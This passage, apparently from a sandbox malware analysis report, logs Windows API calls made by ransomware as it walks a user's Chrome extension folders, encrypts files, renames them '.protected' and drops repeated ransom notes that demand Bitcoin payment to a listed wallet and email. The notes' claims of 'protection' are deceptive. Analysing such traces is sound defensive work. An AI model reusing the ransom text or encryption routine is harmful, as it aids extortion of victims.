(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.263] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.263] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.263] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.263] CloseHandle (hObject=0x164) returned 1 [0081.263] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0081.263] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW") returned 148 [0081.263] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0081.263] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0081.264] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\*") returned 150 [0081.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.264] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.264] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.264] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.264] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.264] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.264] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\.") returned 150 [0081.264] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.264] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.264] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.264] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.264] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.264] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.264] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.264] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\..") returned 151 [0081.264] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.264] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.264] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.264] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.264] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.264] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.264] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.265] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.265] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json") returned 162 [0081.265] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.265] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.265] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.265] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json") returned 162 [0081.265] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json") returned 162 [0081.266] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.266] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json") returned 162 [0081.266] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.266] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x280, lpOverlapped=0x0) returned 1 [0081.267] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.267] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x280, lpOverlapped=0x0) returned 1 [0081.268] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.268] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.268] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.268] CloseHandle (hObject=0x168) returned 1 [0081.268] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.protected") returned 172 [0081.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0081.269] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.269] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.269] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 166 [0081.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.270] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.270] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.271] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.271] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.271] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.271] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.271] CloseHandle (hObject=0x164) returned 1 [0081.273] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0081.273] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0081.273] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\RESTORE_FILES.txt") returned 160 [0081.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.274] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.274] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0081.275] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.275] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0081.275] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.275] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0081.275] CloseHandle (hObject=0x160) returned 1 [0081.275] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.275] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0081.276] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0081.276] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0081.276] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0081.276] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0081.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata") returned 143 [0081.276] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0081.276] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0081.276] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\*") returned 145 [0081.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0081.276] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.276] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.276] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.276] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.276] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.276] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\.") returned 145 [0081.276] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.276] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.276] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.276] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.277] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.277] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.277] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.277] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\..") returned 146 [0081.277] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.277] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.277] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0081.277] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0081.277] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0081.277] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0081.277] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0081.277] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json") returned 166 [0081.277] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0081.277] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0081.277] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0081.277] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0081.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json") returned 166 [0081.278] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0081.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json") returned 166 [0081.278] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0081.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json") returned 166 [0081.278] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0081.278] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0081.280] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.280] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0081.281] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.281] WriteFile (in: 